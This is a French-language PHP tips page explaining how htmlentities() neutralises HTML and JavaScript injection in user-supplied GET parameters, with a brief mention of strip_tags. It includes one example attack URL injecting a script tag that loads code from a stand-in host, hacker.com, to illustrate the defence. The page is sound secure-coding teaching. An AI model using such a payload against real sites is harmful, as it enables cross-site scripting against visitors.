le MEMO du WEB développeur
••• PHP •••  Liste des Mémos, astuces et bonnes pratiques

Protection contre les injections HTML XCSS

La fonction htmlentities() permet de protéger l'affichage de données dont on n'est pas sûr de l'origine en rendant toutes les balises XHTML inopérentes.

Exemple:

http://www.monsite.com?monpseudo=<strong>Justine</strong><script src="http://hacker.com/injection.js" >

<?php echo "Salut ".htmlentities($_GET['monpseudo']); ?>

En gros, cette fonction va remplacer < par &lt; ou > par &gt; à l'affichage, rendant caduque toute tentative malveillante d'injection HTML (ou javascript).

A l'affichage , dans l'exemple précédent, on affichera :

Salut &lt;strong&gt;Justine&lt;strong&gt;&lt;script src=&quot;http://hacker.com/injection.js&quot; &gt;

htmlspecialchars() est l'équivalent de htmlentities() mais il est conseillé d'utiliser cette dernière.

Si l'on veut plutôt supprimer les balises HTML susceptibles d'être ajoutées par l'utilisateur on utilise la fonction strip_tags

publié le 03/01/2012 par Memo Web
Sécurité
Commentaire :
bien fait
par inconnu, le 01/02/2017
Commenter le Mémo :

Affectation conditionnelle sous PHP
Fonction PHP qui permet de savoir si un répertoire est vide ou pas
Problème à l'affichage de l'heure en PHP - 2h de moins
L'utilisation des sessions en PHP
Division en PHP - Partie entière
Enlever des mots avec les expressions régulières
Les variables à nom "variables" en PHP
Bonnes pratiques : Utilisez des simples quotes dans les chaînes PHP
Garder une variable de session après fermeture du navigateur
Trouver l'adresse d'une image expression régulière
Ajoutez vos propres Mémos sur MEMO-WEB

Il suffit de vous créer un compte sur le site

Vous pourrez choisir un thème parmis l'une des catégories proposées par MEMO-WEB.

Rédigez votre Mémo.
Après validation par MEMO-WEB, il sera mis en ligne.
Ajouter vos Mémos